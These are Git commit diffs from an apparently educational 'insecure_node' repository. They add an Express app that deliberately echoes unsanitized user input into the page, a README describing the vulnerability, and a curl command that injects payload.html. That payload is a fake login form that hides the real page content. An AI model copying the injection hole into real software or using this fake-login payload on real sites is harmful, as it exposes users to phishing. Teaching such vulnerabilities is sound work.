chrisparnin · October 7, 2018 17:27 · Oct 7, 2018 · Oct 7, 2018 · Oct 7, 2018
diff --git a/README.md b/README.md
@@ -30,11 +30,13 @@ The attack even will hide the old site content:
   </script> 
 ```
 
-Before:
+### Before:
+
 ![image](https://user-images.githubusercontent.com/742934/46584718-9f07d180-ca34-11e8-9033-b3d1792d37ce.png)
 
 
-After:
+### After:
+
 ![image](https://user-images.githubusercontent.com/742934/46584687-59e39f80-ca34-11e8-91a4-8f11cb89ca39.png)
 
 

diff --git a/README.md b/README.md
@@ -30,4 +30,12 @@ The attack even will hide the old site content:
   </script> 
 ```
 
+Before:
+![image](https://user-images.githubusercontent.com/742934/46584718-9f07d180-ca34-11e8-9033-b3d1792d37ce.png)
+
+
+After:
+![image](https://user-images.githubusercontent.com/742934/46584687-59e39f80-ca34-11e8-91a4-8f11cb89ca39.png)
+
+
 
diff --git a/README.md b/README.md
@@ -0,0 +1,33 @@
+
+### Vulnerability
+
+The application allows for unsanitized data from a user to be displayed on the page.
+
+```javascript
+app.get('/', function (req, res) 
+{
+    res.send('<div id="share"><h1>Share a token with a friend!</h1><p>Alice shared:</p></div>' + token);
+});
+```
+
+### Exploit
+
+Even a small opening can allow for a large injection onto your site.
+
+```
+# Load the html/css/js
+PAYLOAD=$(cat payload.html)
+# Send to service
+curl localhost:3000/ -d "token=${PAYLOAD}"
+```
+
+The attack even will hide the old site content:
+
+```javascript
+  <script>
+    var element = document.getElementById('share');
+    element.style = "visibility: hidden;"
+  </script> 
+```
+
+
diff --git a/index.js b/index.js
@@ -0,0 +1,26 @@
+const express = require('express')
+const bodyParser = require('body-parser')
+
+const app = express()
+const port = 3000
+
+let token = '';
+
+// parse application/x-www-form-urlencoded
+app.use(bodyParser.urlencoded({ extended: false }))
+// parse application/json
+// app.use(bodyParser.json())
+
+app.get('/', function (req, res) 
+{
+    res.send('<div id="share"><h1>Share a token with a friend!</h1><p>Alice shared:</p></div>' + token);
+});
+
+app.post('/', function (req, res) 
+{
+    console.log(req.body);
+    token = req.body.token;
+    res.send('ok\n');
+});
+
+app.listen(port, () => console.log(`Example app listening on port ${port}!`))
diff --git a/package.json b/package.json
@@ -0,0 +1,15 @@
+{
+  "name": "insecure_node",
+  "version": "1.0.0",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "",
+  "license": "ISC",
+  "dependencies": {
+    "body-parser": "^1.18.3",
+    "express": "^4.16.3"
+  }
+}
diff --git a/payload.html b/payload.html
@@ -0,0 +1,135 @@
+
+<div>
+<style scoped> 
+@import url("https://fonts.googleapis.com/css?family=Raleway:400,400i,700");
+
+* {
+  margin: 0;
+  padding: 0;
+  box-sizing: border-box;
+}
+
+html, body {
+  width: 100%;
+  height: 100%;
+}
+
+body {
+ background: #614385;  /* fallback for old browsers */
+background: -webkit-linear-gradient(to right, #516395, #614385);  /* Chrome 10-25, Safari 5.1-6 */
+background: linear-gradient(to right, #516395, #614385); /* W3C, IE 10+/ Edge, Firefox 16+, Chrome 26+, Opera 12+, Safari 7+ */
+  font-family: 'Raleway', sans-serif;
+  letter-spacing: 0.1em;
+}
+
+  .container {
+    width: 400px;
+    height: 400px;
+    background: #EDEDED;
+    position: absolute;
+    margin: auto;
+    top: 0;
+    bottom: 0;
+    left: 0;
+    right: 0;
+    border-radius: 10px;
+    border-bottom: 1px solid rgba(255, 255, 255, 0.3);
+    box-shadow: 2px 2px 20px rgba(0, 0, 0, 0.3);
+  }
+
+    .content-container {
+      width: 95%;
+      height: 100%;
+      position: relative;
+      margin: auto;
+      display: flex;
+      flex-direction: column;
+      justify-content: center;
+    }
+        label {
+          color: #E74C3C;
+          text-transform: uppercase;
+        }
+        input {
+          width: 100%;
+          height: 30px;
+          margin-bottom: 20px;
+          background: none;
+          color: #E74C3C;
+          border: none;
+          border-bottom: 1px solid #E74C3C;
+          opacity: 0.5;
+          transition: opacity 0.3s;
+        }
+        input:hover {
+          opacity: 1;
+        }
+        input:focus {
+          outline: none;
+        }
+      .frg-password {
+        text-decoration: none;
+        color: #E74C3C;
+      }
+      .frg-password:hover {
+        color: black;
+      }
+      .frg-password:visited {
+        color: #E74C3C;
+      }
+      .login {
+        width: 100%;
+        height: 30px;
+        border: none;
+        margin-bottom: 20px;
+        border-radius: 25px;
+        font-family: 'Raleway', sans-serif;
+        letter-spacing: 0.2em;
+        color: #E74C3C;
+        transition: background 1s, color 1s;
+      }
+      .login:hover {
+        background: #E74C3C;
+        color: #ECF0F1;
+        cursor: pointer;
+      }
+      .media {
+        width: 100%;
+        height: 30px;
+        border: none;
+        margin: 5px 0;
+        border-radius: 25px;
+        opacity: 0.8;
+        transition: opacity 0.3s;
+      }
+      .media:hover {
+        opacity: 1;
+        cursor: pointer;
+      }
+      .fb {
+        background: #3A5A98;
+        color: white;
+      }
+      .g {
+        background: #DC4437;
+        color: white;
+      }
+      button:focus {
+        outline: none;
+      }
+</style>
+  <div class="container">
+    <div class="content-container">
+      <label for="email">E-mail</label><br>
+      <input id="email" type="text" placeholder="[email protected]" required>
+      <label for="password">Password</label><br>
+      <input id="password" type="password" placeholder="*****" pattern=".{3,10}" title="Password should be between 3 and 10 characters.">
+      <a class="frg-password" href="#">Forgot password ?</a><br>
+      <button class="login">LOGIN</button>
+    </div>
+  </div>
+  <script>
+    var element = document.getElementById('share');
+    element.style = "visibility: hidden;"
+  </script> 
+</div>
No results found